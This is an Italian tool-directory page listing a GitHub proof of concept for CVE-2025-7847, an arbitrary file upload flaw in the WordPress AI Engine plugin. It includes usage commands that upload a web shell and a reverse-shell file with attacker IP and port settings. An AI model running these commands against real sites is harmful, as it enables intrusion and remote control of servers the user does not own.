Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-7847-POC — Plugin Wordpress AI Engine 2.9.3 - 2.9.4 Proof Of Concept | Kitploit
Strumenti/GitHubGitHub/ericardiansa/cve-2025-7847-poc
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubericardiansa/cve-2025-7847-poc

CVE-2025-7847-POC

Plugin Wordpress AI Engine 2.9.3 - 2.9.4 Proof Of Concept

Vedi Repository
121 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-7847 Plugin WordPress - POC di Caricamento Arbitrario di File da Abbonato Autenticato

Plugin WordPress AI Engine 2.9.3 - 2.9.4 - Prova di Concetto

Si prega di notare che questa vulnerabilità può essere sfruttata solo se l’opzione “Public API” è abilitata, che è disabilitata per impostazione predefinita, e se non è configurato alcun Bearer Token, né è aggiunta e utilizzata autenticazione personalizzata per proteggere l’API.

Versione automatizzata

root@kitploit:~
python3 exploit-auto.py --url "http://target.com" --username "Admin" --password "L87*********C4u" --file reverse.php --attacker-ip 127.0.0.1 --attacker-port 4444

Solo caricamento Web Shell

root@kitploit:~
python3 exploit.py \                                                                                                                          
  --url "http://target.com/" \
  --username "Admin" \
  --password "L87*********C4u" \
  --file shell.php
Scarica lo strumento